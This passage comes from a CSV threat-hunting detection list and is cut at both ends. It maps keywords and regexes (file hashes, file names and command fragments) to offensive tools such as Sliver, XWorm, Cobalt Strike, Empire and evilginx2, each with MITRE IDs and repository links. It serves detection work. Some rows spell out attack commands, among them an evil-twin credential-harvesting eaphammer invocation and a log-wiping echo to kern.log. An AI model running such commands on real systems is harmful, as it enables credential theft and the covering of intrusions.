tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ea912ca7c74d76924cdf1e634164d723a6d7a48212ab03c0f343a0132754a41b*",".{0,1000}ea912ca7c74d76924cdf1e634164d723a6d7a48212ab03c0f343a0132754a41b.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579*",".{0,1000}ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*ea9f997ffb3dd610c9848af65ed980b348c06d8ee11b7fb670d6a789f8075c5a*",".{0,1000}ea9f997ffb3dd610c9848af65ed980b348c06d8ee11b7fb670d6a789f8075c5a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*eaae77ff59bd46d07499b29eaefb4ba3f1d1e36fe3c99ab46bb1fd578113cbe5*",".{0,1000}eaae77ff59bd46d07499b29eaefb4ba3f1d1e36fe3c99ab46bb1fd578113cbe5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*",".{0,1000}eaphammer\s\-i\seth0\s\-\-channel\s4\s\-\-auth\swpa\-eap\s\-\-essid\s.{0,1000}\s\-\-creds.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*eaphammer*",".{0,1000}eaphammer.{0,1000}","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","10","1997","298","2024-04-02T22:57:32Z","2017-02-04T01:03:39Z" "*eapmd5tojohn*",".{0,1000}eapmd5tojohn.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*earching for systems where privileged users' credentials might be in running memory*",".{0,1000}earching\sfor\ssystems\swhere\sprivileged\susers\'\scredentials\smight\sbe\sin\srunning\smemory.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*EarlyBird_Injection.py*",".{0,1000}EarlyBird_Injection\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*easinvoker.exe*System32*",".{0,1000}easinvoker\.exe.{0,1000}System32.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*EasyHook-Managed*InjectionLoader.cs*",".{0,1000}EasyHook\-Managed.{0,1000}InjectionLoader\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyHook-Managed*WOW64Bypass.*",".{0,1000}EasyHook\-Managed.{0,1000}WOW64Bypass\..{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyHook-Managed/LocalHook.cs*",".{0,1000}EasyHook\-Managed\/LocalHook\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyPersistent.cna*",".{0,1000}EasyPersistent\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*eb6536b06148bb2c1a9c4103b98778d51f1204bd0aaf1b01dfb4a2c103ee000a*",".{0,1000}eb6536b06148bb2c1a9c4103b98778d51f1204bd0aaf1b01dfb4a2c103ee000a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*eb6a95c5c92ae3923ae07b80feac9e215f68eaff1289303063fa575a92c27967*",".{0,1000}eb6a95c5c92ae3923ae07b80feac9e215f68eaff1289303063fa575a92c27967.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*eb760ea670e63083e0fef40c12861c6459ebf28b86129c8d3fa200714b2a0b02*",".{0,1000}eb760ea670e63083e0fef40c12861c6459ebf28b86129c8d3fa200714b2a0b02.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*eb87d686b9a040238e563add68fb05c2776f52332c4798cae372638af3c7fca0*",".{0,1000}eb87d686b9a040238e563add68fb05c2776f52332c4798cae372638af3c7fca0.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*eba7e3def98ff4fe742daf4b2caf56d74fb83b502fc035753646fd5fd115a402*",".{0,1000}eba7e3def98ff4fe742daf4b2caf56d74fb83b502fc035753646fd5fd115a402.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ebaa36db295f1c3a7d59e460ce6813221d0097f3c12ce26e818d4d4ac83c0919*",".{0,1000}ebaa36db295f1c3a7d59e460ce6813221d0097f3c12ce26e818d4d4ac83c0919.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*ebb285411e3ba9431b7c211c1e8ba97753699805f03663cbc367798b4db2c1fc*",".{0,1000}ebb285411e3ba9431b7c211c1e8ba97753699805f03663cbc367798b4db2c1fc.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*ebc544aa7679a2d04acf28f4df70bdfe827962993447321ca71e408dd4e10414*",".{0,1000}ebc544aa7679a2d04acf28f4df70bdfe827962993447321ca71e408dd4e10414.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*ebdf64076861a73d92416c6203d50dd25f4c991372f7d47e7146e29ab41a6892*",".{0,1000}ebdf64076861a73d92416c6203d50dd25f4c991372f7d47e7146e29ab41a6892.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*ebf9bf76500715fe20c475140d200e76b51c400406683827eabb2ab70f9f986f*",".{0,1000}ebf9bf76500715fe20c475140d200e76b51c400406683827eabb2ab70f9f986f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ebfebca063aa056d7ffd8767c7c82d66c0c1a4339eb504a8e0636280dc5b839f*",".{0,1000}ebfebca063aa056d7ffd8767c7c82d66c0c1a4339eb504a8e0636280dc5b839f.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*ebfidpplhabeedpnhjnobghokpiioolj*",".{0,1000}ebfidpplhabeedpnhjnobghokpiioolj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Ebowla-master.zip*",".{0,1000}Ebowla\-master\.zip.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052*",".{0,1000}EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*ec260817672bcc48f734f89e9eac84ebc7903924b36f807caf58c6820c0e336c*",".{0,1000}ec260817672bcc48f734f89e9eac84ebc7903924b36f807caf58c6820c0e336c.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*ec3fea4e00eb0a4712a869b52eacce7efbcdcc9b958b8f46066e6f8969c4f79c*",".{0,1000}ec3fea4e00eb0a4712a869b52eacce7efbcdcc9b958b8f46066e6f8969c4f79c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ec57e5c4d592d1ad0a0e79b22e85f8173bcb3c03f4497957f90def4175ca383d*",".{0,1000}ec57e5c4d592d1ad0a0e79b22e85f8173bcb3c03f4497957f90def4175ca383d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*EC62CE1D-ADD7-419A-84A9-D6A04E866197*",".{0,1000}EC62CE1D\-ADD7\-419A\-84A9\-D6A04E866197.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ec6f110ed955c4659147b008e4e1053b15a873b5bb887662b0685f84d929c44c*",".{0,1000}ec6f110ed955c4659147b008e4e1053b15a873b5bb887662b0685f84d929c44c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*eca525adef0c1dae7233b25f241c19cddbe8683cbbadd7c69915f7b3c37fb21f*",".{0,1000}eca525adef0c1dae7233b25f241c19cddbe8683cbbadd7c69915f7b3c37fb21f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ecb8ca794b3659f7ecf353e6ae879a6e405bae62ebaeb69cc12d596915d0e0d9*",".{0,1000}ecb8ca794b3659f7ecf353e6ae879a6e405bae62ebaeb69cc12d596915d0e0d9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae*",".{0,1000}ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae*",".{0,1000}ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae","10","10","N/A","N/A","N/A","N/A" "*ecf32e9cc006fb558375569ad4021fe588206e04722fe0474a34d05d9cc358f5*",".{0,1000}ecf32e9cc006fb558375569ad4021fe588206e04722fe0474a34d05d9cc358f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ecfb9ac1dd1fec043188b3c66c6fbc54c824c9de99e964abfc08836e9877701b*",".{0,1000}ecfb9ac1dd1fec043188b3c66c6fbc54c824c9de99e964abfc08836e9877701b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*echo ""Nothing to see here ... "" > /var/log/kern.log*",".{0,1000}echo\s\""Nothing\sto\ssee\shere\s\.\.\.\s\""\s\>\s\/var\/log\/kern\.log.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*echo * > \\.\pipe\*",".{0,1000}echo\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*echo */24 | dnsx -silent -resp-only -ptr*",".{0,1000}echo\s.{0,1000}\/24\s\|\sdnsx\s\-silent\s\-resp\-only\s\-ptr.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*echo 123 > c:\windows\temp\test.txt*",".{0,1000}echo\s123\s\>\sc\:\\windows\\temp\\test\.txt.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*echo '8.8.8.8' | 